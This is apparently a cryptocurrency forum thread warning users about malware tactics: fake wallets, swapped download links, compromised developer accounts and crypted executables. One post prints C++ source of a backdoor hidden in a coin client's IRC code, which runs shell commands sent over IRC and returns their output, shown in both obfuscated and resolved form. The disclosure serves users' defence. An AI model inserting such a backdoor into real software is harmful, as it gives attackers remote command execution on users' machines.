erichall
|
|
April 03, 2018, 11:43:32 PM |
|
It does seem to get worse.
But, the best thing you can do to start with in protecting your funds, is getting yourself a hardware wallet and storing tokens there. Avoid online wallets like MEW.
|
|
|
|
jaymor11
Newbie
Offline
Activity: 88
Merit: 0
|
|
April 04, 2018, 02:52:06 AM Last edit: April 04, 2018, 03:56:42 AM by jaymor11 |
|
Malicious software or “malware” for short is a broad class of software built with malicious intent. To identify i will tell you how.A newbie asks for the latest wallet, or wallet that doesn’t have any TX fees, or the latest/fastest miner, and the attacker posts a program with malware embedded as a response. This type of attempt usually gets spotted pretty quickly.The attacker creates a new ANN topic and posts a malware link as the download file (or a legit one and changes it to a malware one later).The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.Those were just an examples of how they used it. So think before acting.
|
|
|
|
sudnokpok
|
|
April 04, 2018, 07:09:51 AM |
|
Yea, be carefull what are you opening. I had problem once hardly i fixed it. This malware infections are very dangerous. Every miner should know that.
|
|
|
|
MashaVik
Newbie
Offline
Activity: 122
Merit: 0
|
|
April 05, 2018, 06:33:31 PM |
|
Wow! Thanks for the info! Excellent data! Carefully study this subject, and I take my notes!
|
|
|
|
ArunV10
Newbie
Offline
Activity: 3
Merit: 0
|
|
April 06, 2018, 03:22:06 AM |
|
Very interesting read! Thanks!
|
|
|
|
laserfocused
|
|
April 07, 2018, 12:18:16 AM |
|
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety. "latest wallet"/"custom wallet"/"faster miner"A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly. Copied/new ANNThe attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later). Replacing links in quotesThe attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link. Compromised dev accountThe developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update. Packed/FUD executablesIn most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable. Modified source with backdoorThis was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism. here is the relevant source code: if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) { CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; CFree(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str()); } } here is the source code with macros resolved: if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1) { FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; pclose(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str()); } } The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.Thanks for posting this. There is always something that we have to look out for.
|
|
|
|
cemungut
Member
Offline
Activity: 125
Merit: 10
|
|
April 07, 2018, 07:34:26 AM |
|
Information so useful that we can secure the wallet from the virus that will cause a big problem later therefore should be able to find the right solution to prevent it by making good security
|
|
|
|
cryptojaymark
Newbie
Offline
Activity: 98
Merit: 0
|
|
April 07, 2018, 09:30:40 AM |
|
Thanks this was very informative. and inform to us..
|
|
|
|
sayboo999
Newbie
Offline
Activity: 209
Merit: 0
|
|
April 08, 2018, 09:02:19 PM |
|
Hello) At me the first purse has been cracked and now I am very cautious ... Has installed a firewall, whether it will help to protect savings ...?
|
|
|
|
supremo666
Newbie
Offline
Activity: 266
Merit: 0
|
|
April 09, 2018, 11:36:36 AM |
|
Thanks for the information ... But can you please give us the exact name of the coins ... Thank you !!!
|
|
|
|
aedankreios
Jr. Member
Offline
Activity: 182
Merit: 1
|
|
April 10, 2018, 12:11:20 PM |
|
Thank you for letting us know this information it will really helps individual to secure their accounts. Just avoid the things you find suspicious.
|
GigTricks WORLD FIRST INTEGRATED FREELANCE & ON-DEMAND ECOSYSTEMS Whitepaper | Bounty | ANN Thread | www.gigtricks.io
|
|
|
sudnokpok
|
|
April 11, 2018, 08:39:11 AM |
|
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
|
|
|
|
Legion381
Newbie
Offline
Activity: 19
Merit: 0
|
|
April 11, 2018, 03:44:03 PM |
|
seeems very good
|
|
|
|
tonyt25
Newbie
Offline
Activity: 10
Merit: 0
|
|
April 12, 2018, 09:00:44 AM |
|
Wow, I am really loving this platform.☺️😂😃😁
|
|
|
|
t25tony
Newbie
Offline
Activity: 3
Merit: 0
|
|
April 12, 2018, 09:06:47 AM |
|
Nice 👍 job against these malwares, fell victim on a couple of occasions and it not a nice experience. Good job 👏🏼 guys
|
|
|
|
altcoiner
|
|
April 12, 2018, 09:23:40 AM |
|
As much as we like freebies we should be careful of the application we install on our systems expecially hack copy of an application because most of the hacker want valuable information back from us which will give to them not knowing and my first BTC wallet balance was emptied because i save the private key and password on my desktop by Zbot/Zeus trojan. I learnt my lesson in hard way
|
|
|
|
always2late
Newbie
Offline
Activity: 62
Merit: 0
|
|
April 13, 2018, 06:29:16 AM |
|
You know im really glad that im seeing this. I lost a bunch of money when https://coinsmarkets.com went down, and I felt like an idiot. Ive been in the space too long to be making noob mistakes like leaving your coins on the exchange, but at the same time. I've also been in the space for so long that i don't trust every random developer who makes a coin. With that said I still feel dumb for my choices not because I left coins in general but because the coins that i had on the exchange were coins that i had wallets installed for Main point for this post is that were getting to the point where for those of us who really understand whats going on but arent software devs ourselves its scary AF to get into any of these non major platforms
|
|
|
|
zmeddy
|
|
April 13, 2018, 11:03:13 AM |
|
Omg, thanks for the information, I'm always very afraid of losing my data or getting a virus, just cured the computer from a miner who was almost six months mining on my computer ((
|
|
|
|
alex massi
Newbie
Offline
Activity: 89
Merit: 0
|
|
April 18, 2018, 05:46:47 AM |
|
Thanks that is realy serious i mean coping links would do that we all should be careful
|
|
|
|
sudnokpok
|
|
April 18, 2018, 05:50:14 AM |
|
in my case, IE11 was completely locked up and I had to be fast with the "end process" clicks. I've never had my browser hijacked like this. That is unless we count AMD's user surveys they keep imposing on us after a driver install.
|
|
|
|
|